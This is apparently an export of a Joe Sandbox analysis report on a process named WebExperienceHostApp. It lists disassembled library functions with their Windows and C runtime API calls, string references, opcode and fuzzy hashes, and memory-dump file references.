Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ExceptionThrow$std::ios_base::failure::failure
String ID: ios_base::badbit set
API String ID: 1099746521-3882152299
Opcode ID: a934e826d32ede37d3e5b424d5656a2318ae423a750d11c43174206a3af171af
Instruction ID: 26dfa87f9cb45538092aa70ff3208616d477d5b9605b376d79e4abef01eafb67
Opcode Fuzzy Hash: a934e826d32ede37d3e5b424d5656a2318ae423a750d11c43174206a3af171af
Instruction Fuzzy Hash: D3012B61B1B507D1F718D619DCA1DBA3351EF90349F14A075D62E099FEDEBCE7068240

Function 00007FFE13202410 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFE13206770: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE132023AE), ref: 00007FFE1320677E

terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE1320244E

Strings

RCC, xrefs: 00007FFE13202420
csm, xrefs: 00007FFE13202430
MOC, xrefs: 00007FFE13202428

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: abortterminate
String ID: MOC$RCC$csm
API String ID: 661698970-2671469338
Opcode ID: 47db328f9ad3fe6785f7c33411a4be44342857283f86d96f95ada9c86e643c8e
Instruction ID: 3c23d9e6418ca16a87fe8092b136ac14108354284e2d359cd90e3ca67a51024c
Opcode Fuzzy Hash: 47db328f9ad3fe6785f7c33411a4be44342857283f86d96f95ada9c86e643c8e
Instruction Fuzzy Hash: 58F04F36918A0689E7607F22E18506D37B4EBD8B64F1950B1D74816272CF3CE8A8CA41

Function 00007FF625A18800 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 23libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF625A1881F
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF625A1882F

Strings

RaiseFailFastException, xrefs: 00007FF625A18828
kernelbase.dll, xrefs: 00007FF625A18815

Memory Dump Source

Source File: 00000005.00000002.1866698009.00007FF625A11000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF625A10000, based on PE: true

Associated: 00000005.00000002.1866676299.00007FF625A10000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866720971.00007FF625A1A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866748253.00007FF625A1E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1866777794.00007FF625A1F000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff625a10000_WebExperienceHostApp.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RaiseFailFastException$kernelbase.dll
API String ID: 1646373207-919018592
Opcode ID: 9cee964bd7aab848cc37a03405ac079c2a0f27fdeb4b8e053aa243852f3d0080
Instruction ID: 86d375518f3bb9169eb4863088b3470a9c84f004b5fe13125f6b4334efc417d9
Opcode Fuzzy Hash: 9cee964bd7aab848cc37a03405ac079c2a0f27fdeb4b8e053aa243852f3d0080
Instruction Fuzzy Hash: 42F01C25B18A9181EE248F12FD85025A761BF48FD0B44D035ED5E87B28CE2CD8418751

Function 00007FFE132099DC Relevance: 6.2, APIs: 4, Instructions: 193COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1320C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C17D
Part of subcall function 00007FFE1320C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C1B6
Part of subcall function 00007FFE1320C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C4E3

DName::operator+.LIBVCRUNTIME ref: 00007FFE13209B37
DName::operator+.LIBVCRUNTIME ref: 00007FFE13209B96
DName::operator+.LIBVCRUNTIME ref: 00007FFE13209BC8
DName::operator+.LIBVCRUNTIME ref: 00007FFE13209BD8

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+
String ID:
API String ID: 2943138195-0
Opcode ID: e0e856a0689efcaa77ef655b2ee01dfdabc08d004ac59cec928a27a07a1ba9ac
Instruction ID: d1e07081b7a500a9bca5dfc669f82388b29c5c80136cf83971720fbba7f60419
Opcode Fuzzy Hash: e0e856a0689efcaa77ef655b2ee01dfdabc08d004ac59cec928a27a07a1ba9ac
Instruction Fuzzy Hash: 7B915B62E08E528DFB10AB66D8403AC77B1BBA5728F5440B5DE4E376B5DF78A849C340

Function 00007FFE1320A16C Relevance: 6.1, APIs: 4, Instructions: 133COMMONLIBRARYCODE

Download Yara Rule

APIs

DName::DName.LIBVCRUNTIME ref: 00007FFE1320A21E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320A22E
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320A24B

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+$NameName::
String ID:
API String ID: 168861036-0
Opcode ID: db26575aafbf47d1ebfcb41f0a44ab5eea3fe5a11d01272e410fccac97833c0a
Instruction ID: 1830ed4dbefb0b5d1dad0e3455ce2a5768b09e6a41d70b32d43ddfa27ee5b86a
Opcode Fuzzy Hash: db26575aafbf47d1ebfcb41f0a44ab5eea3fe5a11d01272e410fccac97833c0a
Instruction Fuzzy Hash: D0517A72A18E528DF711EF22E8403BC77A1BBA4B68F944175DA0D277A6DF3DA448C700

Function 00007FFDFBA49B28 Relevance: 6.1, APIs: 4, Instructions: 117COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP ref: 00007FFDFBA49C07
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA49C4A
memcpy.VCRUNTIME140_APP ref: 00007FFDFBA49C54
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFBA49C87

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 7371046f5cd766d1bffe046c2d59978eee7b4bc23b1b826026726add19b89a48
Instruction ID: c98fb089e4f60079803e9777d30af12b3d7a4046cfb978c178efa9dfedcb5d9c
Opcode Fuzzy Hash: 7371046f5cd766d1bffe046c2d59978eee7b4bc23b1b826026726add19b89a48
Instruction Fuzzy Hash: 6231E46170AA46C9EB04DB12E564A6A7395AB44BE4F504730DE3D07BF9DEFCE1528300

Function 00007FFDFBA574F8 Relevance: 6.1, APIs: 4, Instructions: 114COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140_APP(?,?,?,7FFFFFFFFFFFFFFE,?,?,?,?,?,?,00000000,00000000,0000003F,00000000,00000048,00007FFDFBA56EF1), ref: 00007FFDFBA575D7
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,7FFFFFFFFFFFFFFE,?,?,?,?,?,?,00000000,00000000,0000003F,00000000,00000048,00007FFDFBA56EF1), ref: 00007FFDFBA5762B
memcpy.VCRUNTIME140_APP(?,?,?,7FFFFFFFFFFFFFFE,?,?,?,?,?,?,00000000,00000000,0000003F,00000000,00000048,00007FFDFBA56EF1), ref: 00007FFDFBA57635
Concurrency::cancel_current_task.LIBCPMT ref: 00007FFDFBA57679

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpy$Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 1775671525-0
Opcode ID: 6a3fb9a081d1040bcb31cb8976ecef3be5baf333ccd0691446595d407ef7610f
Instruction ID: 0f1e4b3a0200c99f0134c754d1a608aafedd3eb4d31bf4d9665f455bb90c7296
Opcode Fuzzy Hash: 6a3fb9a081d1040bcb31cb8976ecef3be5baf333ccd0691446595d407ef7610f
Instruction Fuzzy Hash: 7841E061B0AA5791EB049B16A5249797355EB04BE4F544631EE3D0BBECEEBCE142C300

Function 00007FFDFBA70818 Relevance: 6.1, APIs: 4, Instructions: 99COMMON

Download Yara Rule

APIs

_FXp_setw.LIBCPMT ref: 00007FFDFBA70877
_FXp_movx.LIBCPMT ref: 00007FFDFBA70887

Part of subcall function 00007FFDFBA71064: memcpy.VCRUNTIME140_APP(?,?,00000004,00007FFDFBA7088C), ref: 00007FFDFBA7107A

Part of subcall function 00007FFDFBA70FEC: ldexp.API-MS-WIN-CRT-MATH-L1-1-0(?,?,?,00007FFDFBA7089C), ref: 00007FFDFBA71020

_FXp_movx.LIBCPMT ref: 00007FFDFBA708CE
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFDFBA70947

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Xp_movx$Xp_setw_errnoldexpmemcpy
String ID:
API String ID: 2233944734-0
Opcode ID: 5f6e89d24b1cfb7bdbc1a0da2f84e74a13c0c09dfe02f17bd2c73ce5df9fcb8a
Instruction ID: 0fbc1fd11956baccb12ad5b106a2448704fae9386e97c3dbb08f6fee40b8cd72
Opcode Fuzzy Hash: 5f6e89d24b1cfb7bdbc1a0da2f84e74a13c0c09dfe02f17bd2c73ce5df9fcb8a
Instruction Fuzzy Hash: 3C410B22B1DA4786F3219B25B0219B97390EF48748F644131EA6D933FDDF7CE5168640

Function 00007FFDFBA43110 Relevance: 6.1, APIs: 4, Instructions: 93COMMONLIBRARYCODE

Download Yara Rule

APIs

___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA4312D
___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA43137
islower.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA43174
__pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA431CE

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ___lc_codepage_func___lc_locale_name_func__pctype_funcislower
String ID:
API String ID: 2234106055-0
Opcode ID: ba68687bd1084c1fd20868618680cfa2efd6f955821d8f547e74609adf00972e
Instruction ID: 71592c8a094116247cc22491fd6006659417e2e01874304958479e067c33951c
Opcode Fuzzy Hash: ba68687bd1084c1fd20868618680cfa2efd6f955821d8f547e74609adf00972e
Instruction Fuzzy Hash: 1531D622B0EB42C1FB118B1AA86067D7AD1FB91B91F184036DAA9077FDCEBCE545C710

Function 00007FFDFBA42FD0 Relevance: 6.1, APIs: 4, Instructions: 90COMMONLIBRARYCODE

Download Yara Rule

APIs

___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA42FE7
___lc_codepage_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA42FF1
isupper.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA43027
__pctype_func.API-MS-WIN-CRT-LOCALE-L1-1-0 ref: 00007FFDFBA43087

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: ___lc_codepage_func___lc_locale_name_func__pctype_funcisupper
String ID:
API String ID: 3857474680-0
Opcode ID: 23ab1e88ae2b3b9f22ff4d2e2df039963f5cd33ef94b97e970288bced12dc4c5
Instruction ID: 9fe106fc3150c8757ee4e0c6ae4dc06f6af77310cfa603758717f7e4d6750691
Opcode Fuzzy Hash: 23ab1e88ae2b3b9f22ff4d2e2df039963f5cd33ef94b97e970288bced12dc4c5
Instruction Fuzzy Hash: 7C31F362B0DB42D1F7158B15A86077D76A1EBC0B81F184135DAAA037FDDEADE684C710

Function 00007FFE1320C5A8 Relevance: 6.1, APIs: 4, Instructions: 86COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFE1320E098: Replicator::operator[].LIBVCRUNTIME ref: 00007FFE1320E0F2

Part of subcall function 00007FFE1320C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C17D
Part of subcall function 00007FFE1320C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C1B6
Part of subcall function 00007FFE1320C0EC: DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C4E3

DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C626
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C635
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C6B2
DName::operator+.LIBVCRUNTIME ref: 00007FFE1320C6C1

Memory Dump Source

Source File: 00000005.00000002.1867000152.00007FFE13201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFE13200000, based on PE: true

Associated: 00000005.00000002.1866978919.00007FFE13200000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867033119.00007FFE13211000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867066118.00007FFE13216000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000005.00000002.1867099902.00007FFE13217000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffe13200000_WebExperienceHostApp.jbxd

Similarity

API ID: Name::operator+$Replicator::operator[]
String ID:
API String ID: 3863519203-0
Opcode ID: 137f35b8ab8777edeeea4d3d93e268a54653f94e00eb99c599d23a709cf02532
Instruction ID: c0e9b8aae4e031e3791631ff27464f749b89f26fed1680a0784f0be288c217f1
Opcode Fuzzy Hash: 137f35b8ab8777edeeea4d3d93e268a54653f94e00eb99c599d23a709cf02532
Instruction Fuzzy Hash: AE4169B2A08B518EFB11DF66D4403AC77B0FBA4B68F548075DA4D6B769DF389449C700

Function 00007FFDFBA49F60 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA49CD0: CreateFile2.API-MS-WIN-CORE-FILE-L1-2-0 ref: 00007FFDFBA49D00

GetFileInformationByHandleEx.API-MS-WIN-CORE-FILE-L2-1-0 ref: 00007FFDFBA49FCB
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FFDFBA49FDA
GetFileInformationByHandleEx.API-MS-WIN-CORE-FILE-L2-1-0 ref: 00007FFDFBA4A00D
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FFDFBA4A01C

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: Handle$CloseFileInformation$CreateFile2
String ID:
API String ID: 1163284826-0
Opcode ID: c98a8f08e21ed10e916e511ab44b33d144b6336d3769b1fd7808e17c69bf46a3
Instruction ID: 730846a4b295e3484a3fe1007ad1d73de0db0cef513b7c2fbac9ef169e814234
Opcode Fuzzy Hash: c98a8f08e21ed10e916e511ab44b33d144b6336d3769b1fd7808e17c69bf46a3
Instruction Fuzzy Hash: A731E322B06A0688F750DB71D420ABE33B0AB44BA8F504731CD3D177F8EEB899968340

Function 00007FFDFBA7B9C0 Relevance: 6.1, APIs: 4, Instructions: 82COMMON

Download Yara Rule

APIs

___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,00000000,?,?,?,00007FFDFBA6F441), ref: 00007FFDFBA7BA07
memcpy.VCRUNTIME140_APP(?,00000000,?,?,?,00007FFDFBA6F441), ref: 00007FFDFBA7BA2B
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00007FFDFBA6F441), ref: 00007FFDFBA7BA38
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,00000000,?,?,?,00007FFDFBA6F441), ref: 00007FFDFBA7BAAB

Part of subcall function 00007FFDFBA42E70: wcsnlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA42E9A
Part of subcall function 00007FFDFBA42E70: LCMapStringEx.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFDFBA42EDE

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: String___lc_locale_name_funcfreemallocmemcpywcsnlen
String ID:
API String ID: 2888714520-0
Opcode ID: f175193b6c3cb69a186ef12907c31e75d148df82e888f905f451e463fc05ba55
Instruction ID: 9c32b87fb497075c2c9f653bb4435c1a6bc7ffbaa51eefa235c563d583a6371f
Opcode Fuzzy Hash: f175193b6c3cb69a186ef12907c31e75d148df82e888f905f451e463fc05ba55
Instruction Fuzzy Hash: D821B66571EB9386D720AF12A42092A7B94FB45BE8FA84231DE79177F8DE7CD4418700

Function 00007FFDFBA4AA30 Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

_wfsopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA4AAD1
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA4AADF
_wfsopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA4AB10
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA4AB2B

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _wfsopen$fclosefseek
String ID:
API String ID: 1261181034-0
Opcode ID: 4b2da362127e04f405fab03e2eb1a3b31cc41c713e6c08ffbf6b669a431fb480
Instruction ID: 532a067cd063bc52060e5b68ea0dce972d396a68b8186937821b65c1e4a2ac36
Opcode Fuzzy Hash: 4b2da362127e04f405fab03e2eb1a3b31cc41c713e6c08ffbf6b669a431fb480
Instruction Fuzzy Hash: 8921A421B1A70785EB698B06E565B2672D2EF84B44F585134CE5E477F8EFBCE9058300

Function 00007FFDFBA4A920 Relevance: 6.1, APIs: 4, Instructions: 77COMMON

Download Yara Rule

APIs

_fsopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA4A9C1
fclose.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA4A9CF
_fsopen.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA4AA00
fseek.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FFDFBA4AA1B

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: _fsopen$fclosefseek
String ID:
API String ID: 410343947-0
Opcode ID: f64390f3235c326aca300763c1886b7c3d144e41e05b7a6f6191a3c4a7674b13
Instruction ID: 0f8559a7543a32424ef843d7fa13d46aad75fa1ab43ace9a71be0b15ec7e18de
Opcode Fuzzy Hash: f64390f3235c326aca300763c1886b7c3d144e41e05b7a6f6191a3c4a7674b13
Instruction Fuzzy Hash: BE21D121B2A70385EB698B06E474F397691AF88F84F595134CE5E437F9EEBCE9418300

Function 00007FFDFBA79070 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFBA528BC: FormatMessageA.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFDFBA528E2

memcpy.VCRUNTIME140_APP ref: 00007FFDFBA790D9

Part of subcall function 00007FFDFBA43474: memcpy.VCRUNTIME140_APP(?,?,?,00007FFDFBA46B5F,?,?,?,00007FFDFBA447EC), ref: 00007FFDFBA43516

memcpy.VCRUNTIME140_APP ref: 00007FFDFBA79115
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FFDFBA7913B

Strings

unknown error, xrefs: 00007FFDFBA790CF

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866883936.00007FFDFBA95000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866925018.00007FFDFBAC3000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000005.00000002.1866955137.00007FFDFBAC7000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfba40000_WebExperienceHostApp.jbxd

Similarity

API ID: memcpy$FormatFreeLocalMessage
String ID: unknown error
API String ID: 1603595190-3078798498
Opcode ID: 393403b6a1f1d4d4069c48657dc765f8cbe8dc40f65fc9da209a8faca06826de
Instruction ID: 98476624782b35a3b885ab76d7fe0ea8699c5348c1526eb9dd0b0d226f8a8d4f
Opcode Fuzzy Hash: 393403b6a1f1d4d4069c48657dc765f8cbe8dc40f65fc9da209a8faca06826de
Instruction Fuzzy Hash: C8219A32709B8281E7149F26E52422D7BA4EB45FC8F184036DB99077AECFBCE161C380

Function 00007FFDFBA7B060 Relevance: 6.1, APIs: 4, Instructions: 62COMMON

Download Yara Rule

APIs

___lc_locale_name_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,00000000,00007FFDFBA7612B), ref: 00007FFDFBA7B094
___lc_collate_cp_func.API-MS-WIN-CRT-LOCALE-L1-1-0(?,?,?,?,?,?,00000000,00007FFDFBA7612B), ref: 00007FFDFBA7B09E

Part of subcall function 00007FFDFBA42740: __strncnt.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA42786
Part of subcall function 00007FFDFBA42740: __strncnt.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDFBA427AB
Part of subcall function 00007FFDFBA42740: GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FFDFBA427EB

memcmp.VCRUNTIME140_APP(?,?,?,?,?,?,00000000,00007FFDFBA7612B), ref: 00007FFDFBA7B0C1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,00000000,00007FFDFBA7612B), ref: 00007FFDFBA7B0FF

Memory Dump Source

Source File: 00000005.00000002.1866831301.00007FFDFBA41000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFDFBA40000, based on PE: true

Associated: 00000005.00000002.1866804564.00007FFDFBA40000.00000002.00000001.01000000.00000007.sdmpDownload File
